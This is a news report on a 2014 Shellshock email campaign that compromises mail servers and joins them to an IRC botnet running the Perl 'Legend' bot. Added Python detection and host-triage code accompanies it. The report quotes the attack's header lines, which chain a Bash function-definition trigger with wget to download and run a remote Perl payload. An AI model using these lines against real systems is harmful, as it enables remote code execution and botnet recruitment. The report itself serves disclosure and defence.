Report: Criminals use Shellshock against mail servers to build botnet

Targeting message transfer agents (MTAs), and mail delivery agents (MDAs), criminals are using Shellshock as a means to create botnets. The process is slow, but working, thanks to unpatched installations of Bash or certain implementations of it.

When it was disclosed in September, Shellshock -- the common name given to a vulnerability in Bash that enables command execution -- impacted systems both large and small, creating ripples across the tech industry.

Vendors struggled to release and maintain patches. For several days after the initial disclosure, researchers found ways to bypass the fixes, leading to the publication of four additional CVE advisories related to the main flaw.

It didn't take long, days in fact, before criminals latched on to the issue. On September 27, researchers at FireEye released details on a number of proof-of-concept scripts related to Shellshock.

"We suspect bad actors may be conducting an initial dry run, in preparation for a real, potentially larger-scale attack. We believe it's only a matter of time before attackers exploit the vulnerability to redirect users to malicious hosts, which can result in further compromise," FireEye wrote at the time.

How right they were. Among the findings from FireEye was a proof-of-concept script that created an IRC-based (Internet Relay Chat) botnet, capable of sending spam, initiating a DDoS attack, or performing remote command execution on the compromised host.

On Friday, CSO became aware of a Shellshock-based campaign targeting organizations in Europe and the United States. It spreads via email, using Shellshock exploitation code in the message header fields. If successful, it delivers a simple Perl script as the payload, which adds the host to a botnet commanded from IRC.

Subsequent investigation by CSO led to the discovery of one of the IRC servers used to host the bots. More than 160 compromised hosts were connected to this server as of October 24.


The Shellshock campaign targets mail servers, searching for vulnerable MTAs / MDAs. The messages themselves are blank, but the code needed to exploit the Shellshock vulnerability is placed into the message's headers.

The person(s) behind the spam blasts are including the following code in several message fields, including the "To:" field, "From:" field, "Subject" field, "Date:" field, "Message ID:" and others.

Message-ID:() { :; };wget -O /tmp/.legend hxxp://190-94-251-41/legend.txt;killall -9 perl;perl /tmp/.legend

References:() { :; };wget -O /tmp/.legend hxxp://190-94-251-41/legend.txt;killall -9 perl;perl /tmp/.legend
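An added detection check, not part of the CSO article: a Python filter that parses a raw message and flags any header field carrying the Shellshock function-definition pattern shown above, so a mail gateway or log review can quarantine such messages before the MTA hands the header to a shell. The sample message is constructed and uses a harmless echo in place of the campaign's payload.

```python
import email
import re

# Shellshock trigger pattern: an exported Bash function body "() { ... }" with
# commands appended after the closing "};". Brace spacing varies between samples
# ("() { :; };" and "() { :;};" both circulated), so match the braces loosely.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;")


def find_shellshock_headers(raw_message):
    """Return [(header_name, header_value)] for every header carrying a
    Shellshock function definition. Every header is checked, because the
    campaign above placed the payload in To, From, Subject, Date, Message-ID
    and References alike."""
    msg = email.message_from_string(raw_message)  # compat32: raw header strings
    hits = []
    for name, value in msg.items():
        if SHELLSHOCK_RE.search(str(value)):
            hits.append((name, str(value)))
    return hits


def appended_command(header_value):
    """Return the text after the function definition, i.e. what a vulnerable
    Bash would have executed, for recording in an incident note."""
    m = SHELLSHOCK_RE.search(header_value)
    return header_value[m.end():].strip() if m else ""


# Constructed sample message (not the campaign's): blank body, a harmless
# echo in the header positions the campaign abused.
SAMPLE = (
    "From: () { :; }; echo SHELLSHOCK-TEST\n"
    "To: postmaster@example.invalid\n"
    "Subject: () { ignored; };echo SHELLSHOCK-TEST\n"
    "Date: Fri, 24 Oct 2014 10:00:00 +0000\n"
    "Message-ID: <clean@example.invalid>\n"
    "References: () { :; }; echo SHELLSHOCK-TEST\n"
    "\n"
)

if __name__ == "__main__":
    for name, value in find_shellshock_headers(SAMPLE):
        print(f"QUARANTINE {name}: {appended_command(value)}")
```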

A full list of the fields, with examples, is available here.

A sample of one of the email messages - complete with headers - is available here, thanks to Benjamin Sonntag, the co-founder of citizen advocacy group La Quadrature du Net.


The IRC server identified by CSO is just one of several. It's installed on a previously compromised Web server that exists on the OVH network, and is maintained by a French IT firm focusing on network integration and information security.

While we were conducting research for this story, the person controlling the bots discovered us, and promptly issued a KLine, banning us from the server.

Given that the IRCd (IRC Daemon) exists on the compromised host and is accessed via Telnet (port 23), it's unlikely the firm is aware of the status of their server. CSO has contacted the IT firm, their web host, and OVH to report the matter.

NOTE: By the time this story went to press, none of those contacted had responded to the issue. The IRCd was off limits to us, but responded to pings. The domain serving the malicious payload was still active.

There is evidence of a second server, existing on a network in Germany, which hosted more than 600 bots earlier this month. The connection between this earlier server and the recently discovered server in France is the IRCd, network naming conventions, and the fact that the same people managed both (based on login details).

The following IP addresses have been linked to incidents leveraging Shellshock as an attack vector.

These addresses either hosted a malicious IRC network, or were used to deliver malicious payloads. In the attack examples seen by CSO, the host was called by IP directly over HTTP (port 80) via cURL. If a domain is used to resolve the host's IP, the attackers tend to use free services, such as

In addition to checking the server logs for the aforementioned IP addresses, administrators should also check to see if any unknown scripts are running on the server. The bots in this campaign are all managed by a Perl script, which will contain strings in its code that are easily found in a grep of the /tmp directory:

Legend Bot [2011]

Legend IRC [2010]


"Installing Mocks please wait"
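An added host-triage helper, not part of the CSO article: it performs the /tmp grep described above for the Legend strings and, because the headers shown earlier launch the bot as "perl /tmp/.legend", also lists perl interpreters whose command line names a script under a temp directory. The fixture it builds is constructed sample data, not material from an infected host.

```python
import os
import tempfile

# Legend's grep strings from the article; the headers above launch the bot as "perl /tmp/.legend".
LEGEND_INDICATORS = ("Legend Bot [2011]", "Legend IRC [2010]", "Installing Mocks please wait")
TMP_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/")

def scan_files_for_indicators(root, indicators=LEGEND_INDICATORS):
    """Walk root (normally /tmp), dotfiles included; return [(path, indicator)] hits."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for path in (os.path.join(dirpath, f) for f in files):
            try:
                with open(path, "rb") as fh:
                    data = fh.read(4_000_000)  # a bot script is far smaller than this
            except OSError:
                continue  # unreadable or already deleted
            hits.extend((path, i) for i in indicators if i.encode() in data)
    return hits

def perl_running_from_tmp(proc_root="/proc", prefixes=TMP_PREFIXES):
    """Return [(pid, argv)] for perl interpreters running a script from a temp dir;
    proc_root is a parameter so the constructed fixture below can stand in for /proc."""
    found = []
    for pid in (p for p in os.listdir(proc_root) if p.isdigit()):
        try:
            with open(os.path.join(proc_root, pid, "cmdline"), "rb") as fh:
                argv = [a.decode(errors="replace") for a in fh.read().split(b"\0") if a]
        except OSError:
            continue  # process exited meanwhile
        if argv and os.path.basename(argv[0]).startswith("perl") and any(
                a.startswith(prefixes) for a in argv[1:]):
            found.append((int(pid), argv))
    return found

def make_fixture():
    """Constructed sample layout, not real infection data: a fake /tmp with one Legend-marked
    dotfile and one clean file, and a fake /proc with one suspicious and one benign perl."""
    base = tempfile.mkdtemp()
    samples = {
        "tmp/.legend": b"#!/usr/bin/perl\n# Legend Bot [2011]\nprint 'Installing Mocks please wait';\n",
        "tmp/clean.txt": b"nothing to see here\n",
        "proc/123/cmdline": b"perl\0/tmp/.legend\0",
        "proc/456/cmdline": b"/usr/bin/perl\0/usr/lib/cpan/script.pl\0",
    }
    for rel, content in samples.items():
        os.makedirs(os.path.dirname(os.path.join(base, rel)), exist_ok=True)
        with open(os.path.join(base, rel), "wb") as fh:
            fh.write(content)
    return os.path.join(base, "tmp"), os.path.join(base, "proc")
```

On a live host, call scan_files_for_indicators("/tmp") and perl_running_from_tmp() with their defaults; the fixture is only for exercising the two checks offline.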


The script that powers the botnet behind this recent campaign is called Legend, and it has existed for several years now. The Legend script is simplistic, but effective once installed on a system. It isn't designed to be clandestine, so it's often discovered during a scan of running processes, TMP directories, or network traffic.

With Legend, a compromised host can be called upon to do a number of things, including open a reverse shell, send spam, initiate a DDoS attack, scan a network with NMAP, or conduct basic Denial of Service via HTTP, TCP, UDP, or SQL. The script can also reveal sensitive information about the host, or turn it into a proxy.

Once installed, Legend will connect the compromised host to a pre-configured IRC server, where the attacker can issue commands individually or as a group. CSO has seen evidence of two Legend scripts circulating online. The source code for the first script, seen in late September and early October, is available here. The second, more recent script can be viewed here.

It's also worth noting that in separate, but related attacks, a second botnet script has been identified. The script, called "JST Perl IrcBot" in the headers, has many of the same functions as Legend. It was suggested as a possible payload when someone on Reddit identified the same campaign that CSO was investigating.


The following MTAs / MDAs are directly impacted by Shellshock in some cases, depending on their configuration. Each [Source] link opens additional sources of information.

Courier Mail Server [Source]

Exim [Source]

QMail [Source] [Source]

Postfix [Source] / Procmail [Source]

There is at least one Shellshock exploit for Postfix circulating online, triggering the same attack as observed in this article. The Procmail source link points to an additional possible attack vector.

Sendmail [Source]

Depending on how it is configured, Sendmail is vulnerable. This is especially true for web scripts that call Sendmail. One example of such a script is sendmail-wrapper, which logs and throttles email sent by PHP. It was patched against Shellshock shortly after it was disclosed.

Above all else, the most important mitigation step is patching Bash to ensure that systems are updated with the latest version. All major vendors and Linux distributions have released patches against Shellshock, including Red Hat, IBM, Juniper, Cisco, Debian, Ubuntu, VMware, McAfee, and HP.

Stories by Steve Ragan